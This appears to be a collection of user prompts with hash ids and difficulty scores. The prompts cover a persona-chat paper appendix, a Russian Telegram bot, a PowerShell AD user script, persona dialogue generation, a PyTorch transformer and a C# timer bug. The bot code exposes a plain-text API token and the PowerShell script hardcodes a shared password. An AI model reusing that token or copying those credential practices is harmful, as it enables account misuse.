Negated personas We prompt an LLM to negate persona attributes. For example, the negation of persona attribute "I like vegetables" is "I don’t like vegetables".
Random personas We randomly select persona attributes from user profiles in other conversations in the dataset.
Contradicting personas We prompt an LLM to generate a persona attribute which contradicts the users’ personas.
Each entry of this task includes 8 user persona attributes as options, where 4 of them are the real persona attributes, and the other 4 are distractors. We evaluate the precision of the human annotators, and report it as a proxy to the conversation faithfulness in Table 3.
Refer to caption
Figure 8: Preview of the Faithfulness Task on the Crowdsourcing Platform.
Appendix C Ablation Studies
We run several ablation studies to evaluate the importance of individual components in our framework. We begin by analyzing the effect of the persona expansion module. We then review the impact of each expert in the mixture forming our Critic.
C.1 Persona Expansion
We assess the importance of the query-based persona expansion module introduced in Section 3.1.1. Similarly to the experiment outlined in Section 4.1, we run the persona expansion on two datasets: Wikipedia and PC. The results of this experiment are presented in Table 17. We designate the persona expansions without the inducted query set (Q) as ‘Wikipedia-0’, and ‘PC-0’, and run the same number of iterations for each (100 iterations). We observe that PC-0 includes 4,477 new persona attributes, 20 percent less than PC. The difference in the number of newly generated persona attributes is more pronounced in the case of Wikipedia, where Wikipedia-0 consists of 4,742 persona attributes, 50 percent less than Wikipedia+. This trend is also observed in the number of persona clusters, with PC-0 and Wikipedia-0 having 6% and 49% less clusters respectively. This pattern suggests the effectiveness of the query-based persona expansion in maintaining the diversity of the persona set. Furthermore, the average persona attribute length in PC-0 is 11.38 tokens, which is 28% less than SPC. This reduction points to less detailed and specific persona attributes. In contrast, the expansion in ‘Wikipedia-0’ exhibits similar average persona attribute lengths compared to ‘Wikipedia+’.
Dataset PC SPC PC-0 Wikipedia Wikipedia+ Wikipedia-0
# Persona Attributes 4,723 10,371 9,200 8,768 18,293 13,510
# Clusters 323 553 520 408 986 502
InterCluster-Dist 0.836 0.863 0.842 0.816 0.85 0.83
AVG length 7.65 15.9* 11.38* 10.45 15.2* 15.2*
Table 17: Evaluation of the Expanded Persona Attribute Sets. The numbers with *′′ indicate the metric value on the newly generated persona attributes, in contrast to the initial persona attributes.
C.2 Conversation Quality
We analyze the effect of the experts within our Critic. We remove each expert, and generate a dataset using one iteration of our framework. We compare the resulting datasets against the output of the first iteration of SPC. We use the evaluators introduced in B.1. The results of this experiment are summarized in Table 15. We observe that the exclusion of the experts results in worse performance according to most criteria: 3 out of 4 in LLM-Eval, 4 out of 6 in GPT-Score, and 3 out of 5 in G-Eval.
C.3 Faithfulness
We ablate the faithfulness critic, and generate a dataset that we compare against SPC. We compare these datasets both automatically, using human annotators (Turing Test), and using a prompted LLM (LLM-Evaluator). We describe this study in more details below.
Turing Test
We run a human study to compare a small subset of conversations created without the faithfulness expert against their equivalent created with that expert. This experiment process is similar to 4.3 and it is conducted for 200 conversations. The precision decreases from 78.0% to 66.0% without this critic, highlighting its effectiveness in eliminating conversations with contradictory information about user personas. The recall decreases from 36.0% to 23.0%, demonstrating a higher reflection of personas in the conversations in the presence of the faithfulness expert.
LLM-Evaluator
We extend our comparison to the entire dataset using an LLM as an annotator, following He et al. (2023); Bansal and Sharma (2023); Chiang and yi Lee (2023). Table 18 shows the faithfulness of the conversations generated in the first iteration without the faithfulness expert. The templates used in the LLM-based annotators are described in Table 15 in the rows with "LLM-Faithfulness" as their evaluator. Note that the annotator-based LLM is created using a different LLM, gpt-3.5-turbo Brown et al. (2020a); Ouyang et al. (2022), than the LLM used for dataset generation.
LLM Evaluator (%) Human Evaluator (%)
Absent Component Inference Contradiction Precision Recall
None 33.2 24.5 78.5 36.4
Faithfulness 32.7 28.8 66.1 23.1
FED 31.7 28.5 N/A N/A
Table 18: Faithfulness of Generated Conversation Datasets Using the Framework While Eliminating Each Component. The first row represents the framework without removing any component, equivalent to the first iteration of Synthetic-Persona-Chat.
C.4 Next Utterance Prediction
We follow the experimental setting described in section 4.2, and compare the performance of various next utterance prediction models trained on SPC against the same models trained on datasets created in the absence of certain experts.
When using the IR Baseline as the next utterance prediction method, we observee that its highest performance of 39% hit@1 occurs when the FED critic is absent during dataset creation. This outcome aligns with FED’s emphasis on conversation quality, excluding persona-related aspects. Conversely, the Transformer Ranker, capable of understanding intricate concepts, achieves its peak performance of 13.9% hit@1 when none of the experts are absent. This result supports the inclusion of both FED and the Faithfulness expert in the model architecture. In generative models, the absence of FED impacts the next utterance prediction model the most, leading to a notable decline in performance (e.g. −12% hit@1, −9% BLEU, −10% ROUGE). This observation underscores the crucial role played by FED in enhancing the generative capabilities of the model.
Absent Component Faithfulness FED None
Method Metric None Persona % Change None Persona % Change None Persona % Change
IR Baseline hit@1 18.7 38.7 +106 19.0 39.0 +105 18.9 38.7 +105
Transformer (Ranker) hit@1 10.9 13.5 +24 10.7 13.6 +27 12.4 13.9 +11
hit@1 8.9 7.4 -16 8.4 7.4 -12 8.2 7.0 -14
Transformer Perplexity 204 214 +5 174 185 +6 203 210 +3
(Generator) BLUE 0.11 0.10 -11 0.11 0.10 -9 0.10 0.08 -15
ROUGE 0.14 0.15 -12 0.14 0.12 -10 0.13 0.10 -17
Table 19: Results of the Next Utterance Prediction Experiment in the Ablation Study. The numbers in the table represent the performance of the trained model on the test portion of the Persona-Chat dataset.
|
c546bf4304bce7e4a08264734b7398c3
|
{
"intermediate": 0.5331140756607056,
"beginner": 0.2768801152706146,
"expert": 0.19000588357448578
}
|
45,687
|
Привет! Помоги мне улучшить функцию "Изменить ответ". Надо сделать так, что если пользователь пишет цифру больше четырех, то бот сообщает ему, что такого варианта нет и возвращает назад. Если пользователь пишет вообще не цифры, то ситуация аналогичная. from aiogram import Bot, Dispatcher, executor, types
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters.state import State, StatesGroup
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardButton, InlineKeyboardMarkup
import aiosqlite
import asyncio
API_TOKEN = '6306133720:AAH0dO6nwIlnQ7Hbts6RfGs0eI73EKwx-hE'
bot = Bot(token=API_TOKEN)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
class Form(StatesGroup):
choosing_action = State()
answer_name = State()
answer_birthday = State()
answer_skills = State()
answer_hobbies = State()
personal_account = State()
edit_answer = State()
new_answer = State()
async def create_db():
async with aiosqlite.connect('memory_page.db') as db:
await db.execute('''CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
last_question_idx INTEGER DEFAULT 0)''')
await db.execute('''CREATE TABLE IF NOT EXISTS answers (
id INTEGER PRIMARY KEY AUTOINCREMENT,
user_id INTEGER,
question TEXT,
answer TEXT,
FOREIGN KEY (user_id) REFERENCES users (id))''')
await db.commit()
async def add_user(user_id: int, username: str):
async with aiosqlite.connect('memory_page.db') as db:
cursor = await db.execute('SELECT id FROM users WHERE id = ?', (user_id,))
user_exists = await cursor.fetchone()
if user_exists:
await db.execute('UPDATE users SET username = ? WHERE id = ?', (username, user_id))
else:
await db.execute('INSERT INTO users (id, username) VALUES (?, ?)', (user_id, username))
await db.commit()
@dp.message_handler(commands="start", state="*")
async def cmd_start(message: types.Message):
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Сгенерировать био"))
markup.add(KeyboardButton("Личный кабинет"))
user_id = message.from_user.id
username = message.from_user.username or "unknown"
await add_user(user_id, username)
await message.answer("Выберите действие:", reply_markup=markup)
await Form.choosing_action.set()
@dp.message_handler(lambda message: message.text == "В меню", state="*")
async def back_to_menu(message: types.Message):
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Сгенерировать био"))
markup.add(KeyboardButton("Личный кабинет"))
await message.answer("Вернули вас в меню. Выберите действие", reply_markup=markup)
await Form.choosing_action.set()
questions = [
"Имя",
"Дата рождения",
"Ваши умения",
"Ваши увлечения"
]
async def save_answer(user_id: int, question: str, answer: str, question_idx: int):
async with aiosqlite.connect('memory_page.db') as db:
# Сохраняем ответ
await db.execute('INSERT INTO answers (user_id, question, answer) VALUES (?, ?, ?)',
(user_id, question, answer))
# Обновляем индекс последнего вопроса пользователя
await db.execute('UPDATE users SET last_question_idx = ? WHERE id = ?', (question_idx, user_id))
await db.commit()
async def set_next_question(user_id: int, question_idx: int):
state = dp.current_state(user=user_id)
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("В меню"))
if question_idx == 0:
await state.set_state(Form.answer_name.state)
await bot.send_message(user_id, questions[0],reply_markup=markup)
elif question_idx == 1:
await state.set_state(Form.answer_birthday.state)
await bot.send_message(user_id, questions[1],reply_markup=markup)
elif question_idx == 2:
await state.set_state(Form.answer_skills.state)
await bot.send_message(user_id, questions[2],reply_markup=markup)
elif question_idx == 3:
await state.set_state(Form.answer_hobbies.state)
await bot.send_message(user_id, questions[3],reply_markup=markup)
else:
await state.reset_state() # Сброс состояния, если все вопросы отвечены
await bot.send_message(user_id, "Вы ответили на все вопросы. Ответы сохранены.",reply_markup=markup)
@dp.message_handler(lambda message: message.text == "Сгенерировать био", state=Form.choosing_action)
async def generate_bio(message: types.Message):
user_id = message.from_user.id
async with aiosqlite.connect('memory_page.db') as db:
# Правильный запрос для получения last_question_idx пользователя
cursor = await db.execute('SELECT last_question_idx FROM users WHERE id = ?', (user_id,))
result = await cursor.fetchone()
if result and result[0] > 0:
# Начать с следующего вопроса на основе last_question_idx
await set_next_question(user_id, result[0])
else:
# Если нет записей или last_question_idx = 0, начинаем с первого вопроса
await set_next_question(user_id, 0)
@dp.message_handler(state=Form.answer_name)
async def process_name(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[0], message.text,1)
await Form.next()
await message.answer(questions[1])
@dp.message_handler(state=Form.answer_birthday)
async def process_birthday(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[1], message.text,2)
await Form.next()
await message.answer(questions[2])
@dp.message_handler(state=Form.answer_skills)
async def process_skills(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[2], message.text,3)
await Form.next()
await message.answer(questions[3])
@dp.message_handler(state=Form.answer_hobbies)
async def process_hobbies(message: types.Message, state: FSMContext):
# Сохраняем последний ответ и завершаем сессию
await save_answer(message.from_user.id, questions[3], message.text,4)
await state.finish()
await message.answer("Спасибо за ответы! Ваши ответы сохранены.")
await cmd_start(message)
@dp.message_handler(lambda message: message.text == "Личный кабинет", state=Form.choosing_action)
async def personal_account(message: types.Message):
user_id = message.from_user.id
answers_text = "Ваши ответы:\n"
async with aiosqlite.connect('memory_page.db') as db:
cursor = await db.execute('SELECT question, answer FROM answers WHERE user_id=? ORDER BY id', (user_id,))
answers = await cursor.fetchall()
for idx, (question, answer) in enumerate(answers, start=1):
answers_text += f"{idx}. {question}: {answer}\n"
if answers_text == "Ваши ответы:\n":
answers_text += "Пока нет ответов."
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Изменить ответ"))
markup.add(KeyboardButton("Заполнить заново"))
markup.add(KeyboardButton("В меню"))
await message.answer(answers_text, reply_markup=markup)
await Form.personal_account.set()
@dp.message_handler(lambda message: message.text == "Изменить ответ", state=Form.personal_account)
async def change_answer(message: types.Message):
await message.answer("Введите номер вопроса, на который хотите изменить ответ:")
await Form.edit_answer.set()
@dp.message_handler(state=Form.edit_answer)
async def process_question_number(message: types.Message, state: FSMContext):
# Сохраняем номер выбранного вопроса для изменения
await state.update_data(question_number=int(message.text))
await message.answer("Введите новый ответ:")
await Form.new_answer.set()
@dp.message_handler(state=Form.new_answer)
async def process_new_answer(message: types.Message, state: FSMContext):
user_data = await state.get_data()
question_number = user_data['question_number']
new_answer = message.text
# Теперь нам нужно обновить ответ пользователя в базе данных
user_id = message.from_user.id
question = questions[question_number - 1] # Использовать индекс от 0
async with aiosqlite.connect('memory_page.db') as db:
await db.execute('UPDATE answers SET answer = ? WHERE user_id = ? AND question = ?', (new_answer, user_id, question))
await db.commit()
await message.answer(f"Ваш ответ на вопрос «{question}» изменен на: {new_answer}")
await state.finish() # Завершаем сессию после изменения ответа
# Возвращаем пользователя в личный кабинет или в основное меню
await personal_account(message)
@dp.message_handler(lambda message: message.text == "Заполнить заново", state=Form.personal_account)
async def refill_form(message: types.Message):
markup = InlineKeyboardMarkup().add(InlineKeyboardButton("Да", callback_data="confirm_refill"))
await message.answer("Вы уверены, что хотите начать заново? Все текущие ответы будут удалены.", reply_markup=markup)
@dp.callback_query_handler(lambda c: c.data == 'confirm_refill', state=Form.personal_account)
async def process_refill(callback_query: types.CallbackQuery):
user_id = callback_query.from_user.id
async with aiosqlite.connect('memory_page.db') as db:
# Удаление ответов пользователя
await db.execute('DELETE FROM answers WHERE user_id=?', (user_id,))
await db.commit()
# Сброс индекса последнего вопроса на 0, чтобы начать заново
await db.execute('UPDATE users SET last_question_idx = 0 WHERE id = ?', (user_id,))
await db.commit()
await bot.answer_callback_query(callback_query.id)
await cmd_start(callback_query.message)
async def main():
await create_db()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
executor.start_polling(dp, skip_updates=True)
|
ded58c59b2f61e3ead3f57590368fc99
|
{
"intermediate": 0.30132177472114563,
"beginner": 0.5755687952041626,
"expert": 0.12310939282178879
}
|
45,688
|
my friends want to know the Number of employees will be working by
the end of
the year. The exit status of an employee will depend on their credit Score, Geography,
Gender, Age, tenure, balance, no of products, hascrcard, is an active member, estimated
salary.
They
also
possess
the
previous
year’s
data
so
help
the
my friends
by
building
a
neural
network
model.
create a random sample dataset first and savethat with 100 fields and then import that dataset that csv file and give me output with all the plots available in python with accurate values display that in output with text format with all visual plots needed . I need to present those visual graphs.
|
ac6f0a15230b7cb2503c71f28ddc0f83
|
{
"intermediate": 0.42208775877952576,
"beginner": 0.13792547583580017,
"expert": 0.4399867653846741
}
|
45,689
|
write code in python to predict any give crypto price using history data (5min,1min 1sec) history price data must be collected automatically using a api
|
f3a219a29342978722e009787e3de7a4
|
{
"intermediate": 0.6812955141067505,
"beginner": 0.06319684535264969,
"expert": 0.2555076479911804
}
|
45,690
|
#Uses a foreach loop to create multiple users from the input CSV file
foreach ($dataRecord in $dataSource) {
#Constructs the common name (CN) for the user account
$cn = $dataRecord.FirstInitial + " " + $dataRecord.LastName
#creates the sAMAccountName for the user account
$sAMAccountName = $dataRecord.FirstInitial + $dataRecord.LastName
$sAMAccountName = $sAMAccountName.ToLower()
#Extracts the first and last name from the input data
$givenName = $dataRecord.FirstName
$sn = $dataRecord.LastName
#Creates the display name for the user account
$displayName = $sn + ", " + $givenName
#Extracts the department and organizational unit (OU) from the input data
$dept = $dataRecord.Dept
$ou = $dataRecord.OU
# Constructs the user principal name (UPN) for the user account
$userPrincipalName = $sAMAccountName + "@ljbs.netw1500.ca"
#Creates the new user account with the specified parameters
New-ADUser `
-SamAccountName $sAMAccountName `
-UserPrincipalName $userPrincipalName `
-Name $cn `
-GivenName $givenName `
-Surname $sn `
-DisplayName $displayName `
-Path $ou `
-Department $dept `
-Description $dept `
-Enabled $true `
-AccountPassword (ConvertTo-SecureString "Passw0rd2023" -AsPlainText -Force)
-AccountPassword (convertto-securestring Passw0rd2023 -AsPlainText -Force)
} where do i modify to do this: First, modify CommonName to be FirstName LastName and DisplayName to be FirstInitial, LastName
|
4112d02ef25197488aabad5bd73778da
|
{
"intermediate": 0.3606603443622589,
"beginner": 0.38416606187820435,
"expert": 0.25517353415489197
}
|
45,691
|
$sAMAccountName = $dataRecord.FirstInitial + $dataRecord.LastName
$sAMAccountName = $sAMAccountName.ToLower()
#Extracts the first and last name from the input data
$givenName = $dataRecord.FirstName
$sn = $dataRecord.LastName
#Creates the display name for the user account
$displayName = $sn + ", " + $givenName
#Extracts the department and organizational unit (OU) from the input data
$dept = $dataRecord.Dept
$ou = $dataRecord.OU
# Constructs the user principal name (UPN) for the user account
$userPrincipalName = $sAMAccountName + "@ljbs.netw1500.ca"
#Creates the new user account with the specified parameters
New-ADUser `
-SamAccountName $sAMAccountName `
-UserPrincipalName $userPrincipalName `
-Name $cn `
-GivenName $givenName `
-Surname $sn `
-DisplayName $displayName `
-Path $ou `
-Department $dept `
-Description $dept `
-Enabled $true `
-AccountPassword (ConvertTo-SecureString "Passw0rd2023" -AsPlainText -Force)
-AccountPassword (convertto-securestring Passw0rd2023 -AsPlainText -Force)
}
how to do this with the script and where do i do it:
First, modify CommonName to be FirstName LastName and DisplayName to be FirstInitial, LastName
|
bda8fd0e9f699d447bb4f7bd418e6677
|
{
"intermediate": 0.37904486060142517,
"beginner": 0.27002328634262085,
"expert": 0.3509318232536316
}
|
45,692
|
Objective: To generate persona-based conversational datasets using an enhanced methodology that involves creating and expanding personas, and then matching them to produce rich, persona-driven conversations. This process aims to foster deeper interactions between chatbots and users by incorporating detailed personas that reflect users’ diverse backgrounds, interests, and behaviors.
Methodology Overview:
- Persona Creation: Begin with a set of seed personas. Each persona should encapsulate a unique set of attributes and characteristics that reflect hypothetical but realistic users. Attributes can include hobbies, occupation, family status, preferences, etc.
- Persona Expansion: Utilize unsupervised Large Language Models (LLMs) to augment the initial set of personas. This process involves:
- Query Induction: From the seed set, infer key questions (queries) that relate to persona attributes.
- Persona Bootstrapping: Using the queries derived, prompt LLMs to generate additional persona attributes, effectively expanding the diversity and number of personas.
- User Profile Construction: From the expanded set of persona attributes, construct user profiles. Ensure these profiles are consistent (no conflicting attributes) and sufficiently detailed.
- User Matching: Pair user profiles based on shared or complementary attributes to facilitate engaging conversations. Consider using a similarity scoring system to guide the matching process.
- Conversation Generation: For each matched pair of user profiles, employ a conversation generation step where plausible dialogues between the user pairs are produced. This step should involve iterative refining to enhance the quality and faithfulness of the generated conversations.
Expected Output Schema:
{
“conversations”: [
{
“user_profiles”: [
{
“user_id”: “user1”,
“persona_attributes”: [“Attribute1”, “Attribute2”, …]
},
{
“user_id”: “user2”,
“persona_attributes”: [“Attribute3”, “Attribute4”, …]
}
],
“generated_conversation”: [
{“speaker”: “user1”, “utterance”: “How do you feel about <topic>?”},
{“speaker”: “user2”, “utterance”: “I really enjoy <topic> because…”},
…
]
},
…
]
}
Rules and Guidelines:
1. The entire process from persona creation to conversation generation should be automated, leveraging the capabilities of LLMs.
2. Ensure the generated personas and conversations are diverse, covering a wide range of hypothetical user backgrounds.
3. Maintain high-quality and coherence in conversations, ensuring they are realistic and align with the personas.
4. Include mechanisms for quality control and refinement at each step, especially during the conversation generation phase to ensure the resulting dialogues are both engaging and faithful to the constructed personas.
Evaluation Criteria:
- Diversity and richness of the generated personas.
- Coherence, quality, and faithfulness of the generated conversations to the personas.
- Creativity and innovation in leveraging LLMs for automating the dataset generation process.
INSTRUCTION:
Create a deep conversation in Hindi (but written in English) only and it Must Follow RULES FOR PRODUCING OUTPUT and must be json.
|
acb873d975375c59d22ae0664a38e054
|
{
"intermediate": 0.349260151386261,
"beginner": 0.29794004559516907,
"expert": 0.35279980301856995
}
|
45,693
|
Objective: To generate persona-based conversational datasets using an enhanced methodology that involves creating and expanding personas, and then matching them to produce rich, persona-driven conversations. This process aims to foster deeper interactions between chatbots and users by incorporating detailed personas that reflect users’ diverse backgrounds, interests, and behaviors.
Methodology Overview:
- Persona Creation: Begin with a set of seed personas. Each persona should encapsulate a unique set of attributes and characteristics that reflect hypothetical but realistic users. Attributes can include hobbies, occupation, family status, preferences, etc.
- Persona Expansion: Utilize unsupervised Large Language Models (LLMs) to augment the initial set of personas. This process involves:
- Query Induction: From the seed set, infer key questions (queries) that relate to persona attributes.
- Persona Bootstrapping: Using the queries derived, prompt LLMs to generate additional persona attributes, effectively expanding the diversity and number of personas.
- User Profile Construction: From the expanded set of persona attributes, construct user profiles. Ensure these profiles are consistent (no conflicting attributes) and sufficiently detailed.
- User Matching: Pair user profiles based on shared or complementary attributes to facilitate engaging conversations. Consider using a similarity scoring system to guide the matching process.
- Conversation Generation: For each matched pair of user profiles, employ a conversation generation step where plausible dialogues between the user pairs are produced. This step should involve iterative refining to enhance the quality and faithfulness of the generated conversations.
Expected Output Schema:
{
“conversations”: [
{
“user_profiles”: [
{
“user_id”: “user1”,
“persona_attributes”: [“Attribute1”, “Attribute2”, …]
},
{
“user_id”: “user2”,
“persona_attributes”: [“Attribute3”, “Attribute4”, …]
}
],
“generated_conversation”: [
{“speaker”: “user1”, “utterance”: “How do you feel about <topic>?”},
{“speaker”: “user2”, “utterance”: “I really enjoy <topic> because…”},
…
]
},
…
]
}
Rules and Guidelines:
1. The entire process from persona creation to conversation generation should be automated, leveraging the capabilities of LLMs.
2. Ensure the generated personas and conversations are diverse, covering a wide range of hypothetical user backgrounds.
3. Maintain high-quality and coherence in conversations, ensuring they are realistic and align with the personas.
4. Include mechanisms for quality control and refinement at each step, especially during the conversation generation phase to ensure the resulting dialogues are both engaging and faithful to the constructed personas.
Evaluation Criteria:
- Diversity and richness of the generated personas.
- Coherence, quality, and faithfulness of the generated conversations to the personas.
- Creativity and innovation in leveraging LLMs for automating the dataset generation process.
INSTRUCTION:
Create a deep intelligent and helpful conversation in simple Hindi (but written in English) only and it Must Follow RULES FOR PRODUCING OUTPUT and must be json.
|
13452efbee49d2aaa2414bb08e9af472
|
{
"intermediate": 0.33263519406318665,
"beginner": 0.33852526545524597,
"expert": 0.32883960008621216
}
|
45,694
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as data
import math
import copy
class MultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads):
super(MultiHeadAttention, self).__init__()
assert d_model % num_heads == 0, "d_model must be divisible by num_heads"
self.d_model = d_model
self.num_heads = num_heads
self.d_k = d_model // num_heads
self.W_q = nn.Linear(d_model, d_model)
self.W_k = nn.Linear(d_model, d_model)
self.W_v = nn.Linear(d_model, d_model)
self.W_o = nn.Linear(d_model, d_model)
def scaled_dot_product_attention(self, Q, K, V, mask=None):
attn_scores = torch.matmul(Q, K.transpose(-2, -1)) / math.sqrt(self.d_k)
if mask is not None:
attn_scores = attn_scores.masked_fill(mask == 0, -1e9)
attn_probs = torch.softmax(attn_scores, dim=-1)
output = torch.matmul(attn_probs, V)
return output
def split_heads(self, x):
batch_size, seq_length, d_model = x.size()
return x.view(batch_size, seq_length, self.num_heads, self.d_k).transpose(1, 2)
def combine_heads(self, x):
batch_size, _, seq_length, d_k = x.size()
return x.transpose(1, 2).contiguous().view(batch_size, seq_length, self.d_model)
def forward(self, Q, K, V, mask=None):
Q = self.split_heads(self.W_q(Q))
K = self.split_heads(self.W_k(K))
V = self.split_heads(self.W_v(V))
attn_output = self.scaled_dot_product_attention(Q, K, V, mask)
output = self.W_o(self.combine_heads(attn_output))
return output
class PositionWiseFeedForward(nn.Module):
def __init__(self, d_model, d_ff):
super(PositionWiseFeedForward, self).__init__()
self.fc1 = nn.Linear(d_model, d_ff)
self.fc2 = nn.Linear(d_ff, d_model)
self.relu = nn.ReLU()
def forward(self, x):
return self.fc2(self.relu(self.fc1(x)))
class PositionalEncoding(nn.Module):
def __init__(self, d_model, max_seq_length):
super(PositionalEncoding, self).__init__()
pe = torch.zeros(max_seq_length, d_model)
position = torch.arange(0, max_seq_length, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
self.register_buffer('pe', pe.unsqueeze(0))
def forward(self, x):
return x + self.pe[:, :x.size(1)]
class EncoderLayer(nn.Module):
def __init__(self, d_model, num_heads, d_ff, dropout):
super(EncoderLayer, self).__init__()
self.self_attn = MultiHeadAttention(d_model, num_heads)
self.feed_forward = PositionWiseFeedForward(d_model, d_ff)
self.norm1 = nn.LayerNorm(d_model)
self.norm2 = nn.LayerNorm(d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x, mask):
attn_output = self.self_attn(x, x, x, mask)
x = self.norm1(x + self.dropout(attn_output))
ff_output = self.feed_forward(x)
x = self.norm2(x + self.dropout(ff_output))
return x
class DecoderLayer(nn.Module):
def __init__(self, d_model, num_heads, d_ff, dropout):
super(DecoderLayer, self).__init__()
self.self_attn = MultiHeadAttention(d_model, num_heads)
self.cross_attn = MultiHeadAttention(d_model, num_heads)
self.feed_forward = PositionWiseFeedForward(d_model, d_ff)
self.norm1 = nn.LayerNorm(d_model)
self.norm2 = nn.LayerNorm(d_model)
self.norm3 = nn.LayerNorm(d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x, enc_output, src_mask, tgt_mask):
attn_output = self.self_attn(x, x, x, tgt_mask)
x = self.norm1(x + self.dropout(attn_output))
attn_output = self.cross_attn(x, enc_output, enc_output, src_mask)
x = self.norm2(x + self.dropout(attn_output))
ff_output = self.feed_forward(x)
x = self.norm3(x + self.dropout(ff_output))
return x
class Transformer(nn.Module):
def __init__(self, src_vocab_size, tgt_vocab_size, d_model, num_heads, num_layers, d_ff, max_seq_length, dropout):
super(Transformer, self).__init__()
self.encoder_embedding = nn.Embedding(src_vocab_size, d_model)
self.decoder_embedding = nn.Embedding(tgt_vocab_size, d_model)
self.positional_encoding = PositionalEncoding(d_model, max_seq_length)
self.encoder_layers = nn.ModuleList([EncoderLayer(d_model, num_heads, d_ff, dropout) for _ in range(num_layers)])
self.decoder_layers = nn.ModuleList([DecoderLayer(d_model, num_heads, d_ff, dropout) for _ in range(num_layers)])
self.fc = nn.Linear(d_model, tgt_vocab_size)
self.dropout = nn.Dropout(dropout)
def generate_mask(self, src, tgt):
src_mask = (src != 0).unsqueeze(1).unsqueeze(2)
tgt_mask = (tgt != 0).unsqueeze(1).unsqueeze(3)
seq_length = tgt.size(1)
nopeak_mask = (1 - torch.triu(torch.ones(1, seq_length, seq_length), diagonal=1)).bool()
tgt_mask = tgt_mask & nopeak_mask
return src_mask, tgt_mask
def forward(self, src, tgt):
src_mask, tgt_mask = self.generate_mask(src, tgt)
src_embedded = self.dropout(self.positional_encoding(self.encoder_embedding(src)))
tgt_embedded = self.dropout(self.positional_encoding(self.decoder_embedding(tgt)))
enc_output = src_embedded
for enc_layer in self.encoder_layers:
enc_output = enc_layer(enc_output, src_mask)
dec_output = tgt_embedded
for dec_layer in self.decoder_layers:
dec_output = dec_layer(dec_output, enc_output, src_mask, tgt_mask)
output = self.fc(dec_output)
return output
def generate_data(num_samples, a, b):
"""Generates data with a simple linear function."""
inputs = torch.zeros(num_samples)
targets = torch.zeros(num_samples)
for i in range(num_samples):
x = torch.rand(1) * 10 # Random input between 0 and 10
target = a * x + b
inputs[i] = x
targets[i] = target
return inputs, targets
# Model setup
src_vocab_size = 1
tgt_vocab_size = 1
d_model = 256
num_heads = 4
num_layers = 6
d_ff = 1024
max_seq_length = 1 # We only use 1 for function learning
dropout = 0.1
a = 2.0 # Coefficient for the linear function
b = 3.0 # Constant term for the linear function
transformer = Transformer(src_vocab_size, tgt_vocab_size, d_model, num_heads, num_layers, d_ff, max_seq_length, dropout)
# Training loop
num_samples = 10000 # Generate a larger dataset
inputs, targets = generate_data(num_samples, a, b)
criterion = nn.MSELoss() # Use MSE for continuous function learning
optimizer = optim.Adam(transformer.parameters(), lr=0.0011, betas=(0.9, 0.98), eps=1e-9)
transformer.train()
for epoch in range(25):
optimizer.zero_grad()
output = transformer(inputs, inputs) # No need for teacher forcing here
loss = criterion(output, targets)
loss.backward()
optimizer.step()
print(f"Epoch: {epoch+1}, Loss: {loss.item()}")
|
608d4e5b03046e65970c82286dc097d4
|
{
"intermediate": 0.22222180664539337,
"beginner": 0.541010320186615,
"expert": 0.23676788806915283
}
|
45,695
|
python write logs to file
|
dc4e94e1993c5753f0b4e7e38046e438
|
{
"intermediate": 0.4627645015716553,
"beginner": 0.2085488885641098,
"expert": 0.32868656516075134
}
|
45,696
|
Why I am getting this? When I stop the server its showing many messagebox when its only suppost to show 1
private async void CheckGameAndExpiryAndAccountTimer_Tick(object sender, EventArgs e)
{
try
{
// Check if the game executable exists in any of the specified paths
bool gameInstalled = possibleSteamPaths.Any(steamPath => File.Exists(Path.Combine(steamPath, relativeGamePath)));
// Set the label based on the game installation status
if (gameInstalled)
{
label10.Text = "Game: Installed";
label10.ForeColor = Color.GreenYellow; // Set the color back to black
}
else
{
label10.Text = "Game: Not Installed";
label10.ForeColor = Color.Red;
}
// Recalculate remaining time until expiry
TimeSpan remainingTime = CalculateRemainingTimeUntilExpiry();
// Display remaining time in label5
label5.Text = $"Your account will expire in {remainingTime.Days} days, {remainingTime.Hours} hours, {remainingTime.Minutes} minutes, and {remainingTime.Seconds} seconds";
// Check the account existence
using (SqlConnection connection = new SqlConnection(connectionString))
{
connection.Open();
string query = "SELECT COUNT(*) FROM accounts WHERE UserID > 0";
using (SqlCommand command = new SqlCommand(query, connection))
{
int accountCount = (int)command.ExecuteScalar();
if (accountCount == 0 && !errorShown && !IsGameRunning() && isButtonClickable)
{
errorShown = true;
MessageBox.Show("Contact hermano7066 on discord for info", "You got banned!", MessageBoxButtons.OK, MessageBoxIcon.Warning);
Environment.Exit(1); // Exit the application when user clicks OK
}
}
}
}
catch (SqlException ex)
{
if (ex.Number == -1)
{
// Handle the case when the server is offline
if (!errorShown) // Show the error message only if it hasn't been shown before
{
errorShown = true;
MessageBox.Show("Server is offline, or you lost connection to the ethernet\nMake sure you have a stable Wifi/Ethernet connection", "Lost Connection", MessageBoxButtons.OK, MessageBoxIcon.Error);
Environment.Exit(1); // Exit the application when user clicks OK
}
}
else
{
errorShown = true;
// Handle other SQL Server exceptions
Console.WriteLine(ex.Message);
MessageBox.Show($"SQL Server error: {ex.Message}", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
catch (Exception)
{
